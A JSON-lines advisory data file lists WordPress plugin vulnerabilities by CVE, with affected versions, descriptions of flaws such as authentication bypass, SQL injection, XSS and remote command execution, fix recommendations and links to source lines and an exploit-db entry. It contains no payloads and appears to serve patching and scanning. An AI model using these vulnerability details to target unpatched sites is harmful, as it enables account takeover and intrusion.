{"CVE_ID":"CVE-2024-4544","slug":"pie-register-social-site","versionImpact":"1.7.7","versionEndExcluding":"1.7.8","description":"The Pie Register - Social Sites Login (Add on) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.7. This is due to insufficient verification on the user being supplied during a social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 1.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98179c3-8b32-4d75-9f3f-2367215a740b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98179c3-8b32-4d75-9f3f-2367215a740b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.3\\\/pie-register.php#L2959\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.3\\\/pie-register.php#L2959\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7759","slug":"pwa-for-wp","versionImpact":"1.7.71","versionEndExcluding":"1.7.72","description":"The PWA for WP  WordPress plugin before 1.7.72 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.7.72, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e495b39-f9ef-45dd-b839-65c71a082f2b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e495b39-f9ef-45dd-b839-65c71a082f2b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5756","slug":"digital-publications-by-supsystic","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2304e4dc-0dc6-4ded-b8e6-8d76d70f63d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2304e4dc-0dc6-4ded-b8e6-8d76d70f63d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-publications-by-supsystic\\\/trunk\\\/classes\\\/frame.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-publications-by-supsystic\\\/trunk\\\/classes\\\/frame.php#L144\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2221","slug":"wpcom-member","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The WPCOM Member plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018user_phone\u2019 parameter in all versions up to, and including, 1.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.6\\\/includes\\\/class-sesstion.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.6\\\/includes\\\/class-sesstion.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f491d48-935c-4fd9-a342-44d98c5601b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f491d48-935c-4fd9-a342-44d98c5601b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9226","slug":"landing-page-cat","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Landing Page Cat \u2013 Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9772aa85-15e6-4254-9e76-e5794d71084b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9772aa85-15e6-4254-9e76-e5794d71084b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/landing-page-cat\\\/tags\\\/1.5.4\\\/includes\\\/subscribers.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/landing-page-cat\\\/tags\\\/1.5.4\\\/includes\\\/subscribers.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183651%40landing-page-cat&new=3183651%40landing-page-cat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183651%40landing-page-cat&new=3183651%40landing-page-cat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2797","slug":"official-mailerlite-sign-up-forms","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The MailerLite \u2013 Signup forms (official) plugin for WordPress is vulnerable to unauthorized plugin setting changes due to a missing capability check on the toggleRolesAndPermissions and editAllowedRolesAndPermissions functions in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to allow lower level users to modify forms.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a03b4c19-85fa-47ad-b9ae-b466f8e5ca96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a03b4c19-85fa-47ad-b9ae-b466f8e5ca96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/trunk\\\/src\\\/Admin\\\/Actions.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/trunk\\\/src\\\/Admin\\\/Actions.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070584\\\/official-mailerlite-sign-up-forms\\\/trunk?contextall=1&old=3045803&old_path=%2Fofficial-mailerlite-sign-up-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070584\\\/official-mailerlite-sign-up-forms\\\/trunk?contextall=1&old=3045803&old_path=%2Fofficial-mailerlite-sign-up-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51547","slug":"fluent-support","versionEndExcluding":"1.7.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPManageNinja LLC Fluent Support \u2013 WordPress Helpdesk and Customer Support Ticket Plugin.This issue affects Fluent Support \u2013 WordPress Helpdesk and Customer Support Ticket Plugin: from n\/a through 1.7.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluent-support\\\/wordpress-fluent-support-plugin-1-7-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluent-support\\\/wordpress-fluent-support-plugin-1-7-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1386","slug":"official-mailerlite-sign-up-forms","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The MailerLite \u2013 Signup forms (official) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions 1.5.0 to 1.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f34f4a6-9092-4e67-8a1e-7c60edde0b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f34f4a6-9092-4e67-8a1e-7c60edde0b2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/tags\\\/1.7.3\\\/src\\\/Views\\\/InvalidForm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/tags\\\/1.7.3\\\/src\\\/Views\\\/InvalidForm.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070584%40official-mailerlite-sign-up-forms%2Ftrunk&old=3045803%40official-mailerlite-sign-up-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070584%40official-mailerlite-sign-up-forms%2Ftrunk&old=3045803%40official-mailerlite-sign-up-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4687","slug":"pagelayer","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Page Builder: Pagelayer WordPress plugin before 1.7.7 doesn't prevent unauthenticated attackers from updating a post's header or footer code on scheduled posts.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31596fc5-4203-40c4-9b0a-e8a37faafddd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31596fc5-4203-40c4-9b0a-e8a37faafddd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4757","slug":"list-pages-shortcode","versionEndExcluding":"1.7.6","description":"The List Pages Shortcode WordPress plugin before 1.7.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30211ffd-8751-4354-96d3-69b0106100b1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30211ffd-8751-4354-96d3-69b0106100b1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4294","slug":"url-shortify","versionEndExcluding":"1.7.6","description":"The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1fc71fc7-861a-46cc-a147-1c7ece9a7776\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1fc71fc7-861a-46cc-a147-1c7ece9a7776\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4819","slug":"shared-files","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The Shared Files WordPress plugin before 1.7.6 does not return the right Content-Type header for the specified uploaded file. Therefore, an attacker can upload an allowed file extension injected with malicious scripts.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4423b023-cf4a-46cb-b314-7a09ac08b29a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4423b023-cf4a-46cb-b314-7a09ac08b29a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1475","slug":"wpcom-member","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The WPCOM Member plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.5. This is due to insufficient verification on the 'user_phone' parameter when logging in. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if SMS login is enabled.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.1\\\/includes\\\/form-validation.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.1\\\/includes\\\/form-validation.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248208\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248208\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05178bf3-3040-41aa-ba43-779376d30298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05178bf3-3040-41aa-ba43-779376d30298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2441","slug":"imagemagick-engine","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The ImageMagick Engine plugin for WordPress is vulnerable to remote code execution via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to run arbitrary commands leading to remote command execution, granted they can trick a site administrator into performing an action such as clicking on a link. This makes it possible for an attacker to create and or modify files hosted on the server which can easily grant attackers backdoor access to the affected server.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51025\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51025\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/vulnerability-advisories-continued\\\/#CVE-2022-2441\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/vulnerability-advisories-continued\\\/#CVE-2022-2441\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2801283%40imagemagick-engine%2Ftrunk&old=2732430%40imagemagick-engine%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2801283%40imagemagick-engine%2Ftrunk&old=2732430%40imagemagick-engine%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1f17a83-1df0-44fe-bd86-243cff6ec91b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1f17a83-1df0-44fe-bd86-243cff6ec91b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6482","slug":"login-with-phone-number","versionImpact":"1.7.49","versionEndExcluding":"1.7.50","description":"The Login with phone number plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.49. This is due to a lack of validation and missing capability check on user-supplied data in the 'lwp_update_password_action' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to any other role, including Administrator. The vulnerability was partially patched in version 1.7.40. The login with phone number pro plugin was required to exploit the vulnerability in versions 1.7.40 - 1.7.49.","recommendation":"Update to version 1.7.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7cde2c-142c-4004-9302-be335265d87d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7cde2c-142c-4004-9302-be335265d87d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L3803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L3803\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129185\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129185\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12422","slug":"import-eventbrite-events","versionImpact":"1.7.4","versionEndExcluding":"1.7.5","description":"The Import Eventbrite Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-eventbrite-events\\\/tags\\\/1.7.3\\\/templates\\\/admin\\\/import-eventbrite-events-history.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207381%40import-eventbrite-events&new=3207381%40import-eventbrite-events&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207381%40import-eventbrite-events&new=3207381%40import-eventbrite-events&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f799db97-ca61-439d-94ec-a44270d1cd07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f799db97-ca61-439d-94ec-a44270d1cd07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13504","slug":"shared-files","versionImpact":"1.7.42","versionEndExcluding":"1.7.43","description":"The Shared Files \u2013 Frontend File Upload Form & Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via dfxp File uploads in all versions up to, and including, 1.7.42 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the dfxp file. This issue affects only Apache-based environments, where dfxp files are handled by default.","recommendation":"Update to version 1.7.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shared-files\\\/tags\\\/1.7.40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shared-files\\\/tags\\\/1.7.40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3231372%40shared-files%2Ftrunk&old=3229309%40shared-files%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3231372%40shared-files%2Ftrunk&old=3229309%40shared-files%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4210a0-5448-4ff6-876a-37db4ad9b23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4210a0-5448-4ff6-876a-37db4ad9b23a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-23180","slug":"lead-form-builder","versionEndExcluding":"1.7.4","description":"The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.4 doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da87358a-3a72-4cf7-a2af-a266dd9b4290\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da87358a-3a72-4cf7-a2af-a266dd9b4290\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2670484\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2670484\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12457","slug":"chat-viber","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The Chat Support for Viber \u2013 Chat Bubble and Chat Button for Gutenberg, Elementor and Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vchat' shortcode in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chat-viber\\\/tags\\\/1.7.2\\\/inc\\\/class-custom-buttons-templates.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chat-viber\\\/tags\\\/1.7.2\\\/inc\\\/class-custom-buttons-templates.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7834c0be-3051-4d97-928e-cf5295c93463?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7834c0be-3051-4d97-928e-cf5295c93463?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12825","slug":"custom-related-posts","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The Custom Related Posts plugin for WordPress is vulnerable to unauthorized access & modification of data due to a missing capability check on three AJAX actions in all versions up to, and including, 1.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to search posts and link\/unlink relations.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226283%40custom-related-posts&new=3226283%40custom-related-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226283%40custom-related-posts&new=3226283%40custom-related-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40ba98a0-2193-4201-8370-34fd438dadb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40ba98a0-2193-4201-8370-34fd438dadb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4628","slug":"wp-ecommerce-paypal","versionEndExcluding":"1.7.4","description":"The Easy PayPal Buy Now Button WordPress plugin before 1.7.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ae719da-c43c-4b3a-bb8a-efa1de20100a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ae719da-c43c-4b3a-bb8a-efa1de20100a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8665","slug":"yith-custom-login","versionImpact":"1.7.3","versionEndExcluding":"1.7.4","description":"The YITH Custom Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-custom-login\\\/tags\\\/1.7.3\\\/yit-common\\\/yith-panel.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-custom-login\\\/tags\\\/1.7.3\\\/yit-common\\\/yith-panel.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150123%40yith-custom-login&new=3150123%40yith-custom-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150123%40yith-custom-login&new=3150123%40yith-custom-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150560%40yith-custom-login&new=3150560%40yith-custom-login&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150560%40yith-custom-login&new=3150560%40yith-custom-login&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
